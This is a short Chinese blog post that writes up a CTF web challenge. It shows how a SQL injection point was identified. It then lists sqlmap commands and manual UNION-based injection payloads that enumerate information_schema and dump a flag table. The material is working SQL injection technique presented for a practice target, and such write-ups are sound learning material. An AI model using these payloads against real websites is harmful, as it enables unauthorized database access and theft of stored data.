• 博客园logo
  • 会员
  • 众包
  • 新闻
  • 博问
  • 闪存
  • 赞助商
  • HarmonyOS
  • Chat2DB
    • 搜索
      所有博客
    • 搜索
      当前博客
  • 写随笔 我的博客 短消息 简洁模式
    用户头像
    我的博客 我的园子 账号设置 会员中心 简洁模式 ... 退出登录
    注册 登录
梅不美
博客园    首页    新随笔    联系   管理    订阅  订阅
成绩单

打开地址,输入1正常显示,输入1’报错,输入1#显示,说明此处存在SQL注入,抓包后用sqlmap进行爆破

python2 sqlmap.py -r a.txt --dbs

 

python2 sqlmap.py -r a.txt -D skctf_flag --tables

 

 

  python2 sqlmap.py -r a.txt -D skctf_flag -T fl4g --columns

 

 

 python2 sqlmap.py -r a.txt -D skctf_flag -T fl4g -C skctf_flag --dump

 

也可以通过在浏览器地址进行联合查询注入:

id=0' union select 1,user(),version(),(select group_concat(table_name) from information_schema.tables where table_schema=database())#

id=0' union select 1,user(),version(),(select group_concat(column_name) from information_schema.columns where table_schema=database()and table_name='fl4g')#

id=0' union select 1,user(),version(),(select  skctf_flag from fl4g)#

posted on 2020-08-12 16:38  梅不美  阅读(88)  评论(0)    收藏  举报
刷新页面返回顶部
博客园  ©  2004-2025
浙公网安备 33010602011771号 浙ICP备2021040463号-3